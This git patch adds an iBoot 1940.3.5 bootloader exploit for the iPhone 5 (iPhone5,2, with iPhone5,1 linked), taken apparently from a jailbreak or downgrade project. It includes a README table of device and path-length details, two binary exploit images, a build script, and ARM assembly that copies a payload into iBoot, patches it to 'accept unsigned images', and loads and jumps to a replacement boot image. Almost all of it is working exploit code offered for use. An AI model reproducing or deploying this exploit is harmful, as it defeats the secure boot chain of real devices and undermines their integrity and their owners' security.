From cb3e8a2e2e4858d1f05534bf7a20dd2c2c9841a2 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E3=81=AD=E3=82=80=E3=81=84?=
 <69592455+kok3shidoll@users.noreply.github.com>
Date: Wed, 28 Jun 2023 22:22:53 +0900
Subject: [PATCH] iBoot-1940.3.5/iPhone5,2

---
 exploit/README.md                             |   2 +
 exploit/iBoot-1940.3.5/iPhone5,1              |   1 +
 exploit/iBoot-1940.3.5/iPhone5,2/exploit      | Bin 0 -> 524288 bytes
 .../iBoot-1940.3.5/iPhone5,2/src/asm/build.sh |  11 ++
 .../iPhone5,2/src/asm/iboot_p1.s              | 123 ++++++++++++++++++
 .../iPhone5,2/src/asm/payload.s               |  81 ++++++++++++
 .../iPhone5,2/src/exploit_generic             | Bin 0 -> 524288 bytes
 exploit/iBoot-1940.3.5/iPhone5,2/src/header.h |  26 ++++
 8 files changed, 244 insertions(+)
 create mode 120000 exploit/iBoot-1940.3.5/iPhone5,1
 create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/exploit
 create mode 100755 exploit/iBoot-1940.3.5/iPhone5,2/src/asm/build.sh
 create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/asm/iboot_p1.s
 create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/asm/payload.s
 create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/exploit_generic
 create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/header.h

diff --git a/exploit/README.md b/exploit/README.md
index 4d89796..50f47bc 100644
--- a/exploit/README.md
+++ b/exploit/README.md
@@ -8,6 +8,8 @@
 | iPhone 4s [iPhone4,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/disk.dmg` |  
 | iPad 2 [iPad2,4] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/disk.dmg` |  
 | iPod touch 5G [iPod5,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
+| iPhone 5 [iPhone5,1] | 7.0 - 7.0.6 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
 | iPhone 5 [iPhone5,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
+| iPhone 5 [iPhone5,2] | 7.0 - 7.0.6 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
 | iPhone 5 [iPhone5,2] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
 | iPad 4th [iPad3,5] | 7.0.4 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
diff --git a/exploit/iBoot-1940.3.5/iPhone5,1 b/exploit/iBoot-1940.3.5/iPhone5,1
new file mode 120000
index 0000000..3370556
--- /dev/null
+++ b/exploit/iBoot-1940.3.5/iPhone5,1
@@ -0,0 +1 @@
+iPhone5,2
\ No newline at end of file
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/exploit b/exploit/iBoot-1940.3.5/iPhone5,2/exploit
new file mode 100644
index 0000000000000000000000000000000000000000..b01e0daa7b68f0e4930e1c1ee3daa33c4061ea93
GIT binary patch
literal 524288
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
z0tzUgfC36A@BtT?*nQVtCk+^2fB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_
z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=
zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~
z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz
z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg
zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_
z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=
zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~
z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz
z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg
zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_
z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=
zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~
z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz
z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg
zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_
z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=
zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~
z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz
z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg
zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_
z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=
zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~
z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz
z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg
zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_
z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=
zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~
z0R|XgfB^;=V1NMzE*AsIrhozpD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg
zfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>
z3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A
zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}
z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j
zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg
zfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>
z3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A
zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}
z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j
zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg
zfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>
z3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A
zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0+&sJ$(vF)r7G<lzj-{~)bZJ!
zdydbJjFtWVWtI1@N~x1C@?BFkmCv3|X*6HNDcu-nXScZT1#IzLams^JT6Oj^u3zLf
jogWvcv@4(DMaJbNY@_+H!}0hyyW`xIxWT5t<y7GB8#<)j

literal 0
HcmV?d00001

diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/build.sh b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/build.sh
new file mode 100755
index 0000000..61566be
--- /dev/null
+++ b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/build.sh
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+/opt/gnuarm/bin/arm-none-eabi-gcc -c iboot_p1.s
+/opt/gnuarm/bin/arm-none-eabi-objdump -D iboot_p1.o
+/opt/gnuarm/bin/arm-none-eabi-objcopy -O binary iboot_p1.o iboot_p1.bin
+rm iboot_p1.o
+
+/opt/gnuarm/bin/arm-none-eabi-gcc -c payload.s
+/opt/gnuarm/bin/arm-none-eabi-objdump -D payload.o
+/opt/gnuarm/bin/arm-none-eabi-objcopy -O binary payload.o payload.bin
+rm payload.o
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/iboot_p1.s b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/iboot_p1.s
new file mode 100644
index 0000000..7ac925f
--- /dev/null
+++ b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/iboot_p1.s
@@ -0,0 +1,123 @@
+@ iboot_p1.s
+@
+@ Copyright (c) 2021 - 2023 @ kok3shidoll
+@
+@
+
+
+    .text
+    .syntax    unified
+
+
+    .arm
+_entry:
+    b    _entry
+
+
+    .org    0x21064
+    .thumb
+    .thumb_func
+_get_current_task:
+    bx    lr
+
+
+    .org    0x227ec
+    .thumb_func
+_arch_cpu_quiesce:
+    bx    lr
+
+
+    .org    0x257e0
+    .thumb
+    .thumb_func
+_decompress_lzss:
+    bx    lr
+
+
+    .org    0x341d8
+    .arm
+_bcopy:
+    bx    lr
+
+
+    .org    0x34c2c
+    .thumb
+    .thumb_func
+_disable_interrupts:
+    bx    lr
+
+
+    .org    0x478a0
+    .thumb
+    .thumb_func
+_iboot_patch:
+    ldr    r0, =0xbff478b2          @ end point of _iboot_patch()
+    ldr    r1, =0x84043240          @ payload
+    movs   r2, #0x44                @ payload_sz
+    blx    _bcopy
+
+    ldr    r0, =0xc2c               @ main_task() ptr
+    ldr    r1, =(0xbff43240 + 1)    @ payload_base
+    str    r1, [r4, r0]
+
+    b.n     _payload2
+
+
+    .org    0x47bb0
+    .global _payload
+    .thumb
+    .thumb_func
+_payload:
+    ldr    sp, =0xbfff8000
+    bl     _disable_interrupts
+    ldr    r4, =0x84000000
+
+    ldr    r0, =0xbff00000          @ could be 0, but we use explicit offset for iloader
+    mov    r1, r4
+    ldr    r2, =0x446c0
+    blx    _bcopy
+
+    b.n    _iboot_patch
+
+_payload2:
+    @ accept unsigned images
+    ldr    r0, =0x1ad14
+    ldr    r1, =0x60182000
+    str    r1, [r4, r0]
+
+    bl     _get_current_task
+    movs   r1, #0
+    str    r1, [r0, #0x44]
+
+    ldr    r0, =0xbff48000          @ dst
+    movs   r1, #0xfc                @ dst_sz
+    ldr    r2, =0xbff47a7c          @ nettoyeur
+    movs   r3, #0xe6                @ nettoyeur_sz
+
+    mov    r5, r0
+    bl     _decompress_lzss
+    ldr    r0, =(0xbff01768 + 1)
+
+   @b.n    next
+_next:
+    blx    r0
+    bl     _arch_cpu_quiesce
+    blx    r5                       @ nettoyeur()
+    bx     r4
+
+
+.align    2
+
+
+    .org    0x47BF4
+    .long   0xe7ffdef0
+    .short  0xdef0
+
+next:
+    @blx   r0
+    @bl    _arch_cpu_quiesce
+    @blx   r5                       @ nettoyeur()
+    @bx    r4
+    nop
+
+.align    2
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/payload.s b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/payload.s
new file mode 100644
index 0000000..35dce93
--- /dev/null
+++ b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/payload.s
@@ -0,0 +1,81 @@
+@ payload.s
+@
+@ Copyright (c) 2021 - 2023 @ kok3shidoll
+@
+@
+
+
+.set    JUMP_ADDRESS_PTR,   0xbff432a0  @ end point of payload
+.set    IMAGE3_TYPE,        0x69626f62  @ 'ibob' : new iBoot TYPE
+
+
+    .text
+    .syntax unified
+
+    .arm
+_entry:
+    b   _entry
+
+
+    .org    0x00844
+    .thumb
+    .thumb_func
+_find_boot_images:
+    bx    lr
+
+
+    .org    0x1f790
+    .thumb
+    .thumb_func
+_platform_init:
+    bx    lr
+
+
+    .org    0x2068c
+    .thumb
+    .thumb_func
+_prepare_and_jump:
+    bx    lr
+
+
+    .org    0x257b0
+    .thumb
+    .thumb_func
+_image_load_type:
+    bx    lr
+
+
+    .org    0x34c2c
+    .thumb
+    .thumb_func
+_disable_interrupts:
+    bx    lr
+
+
+    .org    0x43240
+    .global _payload
+    .thumb
+    .thumb_func
+_payload:
+    ldr        sp, =0xBFFF8000
+    bl         _disable_interrupts
+
+    bl         _platform_init
+    bl         _find_boot_images
+
+    ldr        r0, =JUMP_ADDRESS_PTR
+    adds       r1, r0, #0x4
+    mov.w      r2, #0x84000000
+    str        r2, [r0]
+    mov.w      r2, #0x100000
+    str        r2, [r1]
+    ldr        r2, =IMAGE3_TYPE
+    bl         _image_load_type         @ _image_load_type(*ptr, *sz, type)
+
+    movs       r0, #0x2                 @ BOOT_IBOOT
+    ldr        r1, =0x84000000          @ ptr
+    movs       r2, #0x0                 @ args
+    movs       r3, #0x0
+    bl         _prepare_and_jump        @ _prepare_and_jump(BOOT_IBOOT, jumpaddr, 0, 0)
+
+    nop
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/exploit_generic b/exploit/iBoot-1940.3.5/iPhone5,2/src/exploit_generic
new file mode 100644
index 0000000000000000000000000000000000000000..7304f495d9b7f0a7813795c1c9ec7c3c35f75e4c
GIT binary patch
literal 524288
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
z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#
zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|
z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb
zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0
z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<
z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#
zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|
z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb
zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0
z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<
z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#
zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|
z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb
zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0
z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<
z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#
zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|
z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb
zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0
z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<
z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#
zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|
z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb
zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0
z00Rs#zyJdbY!w5^rhozpD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A
zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}
z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j
zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg
zfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>
z3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A
zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}
z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j
zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg
zfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>
z3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A
zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}
z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j
zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0$ZlQ>4#H4r79htJ~kac)Z)VNlZy)z
zQ{}k5uJZ8%DfRMIzH6$^=8MZIP3EiE(~-DX+2Xz%*y6cj&x2DMS-Fneo80E|<6=)I
e@*XcTuJ2--%#R(9$H&Fvt2g2cHU+j)fqw$``e#1?

literal 0
HcmV?d00001

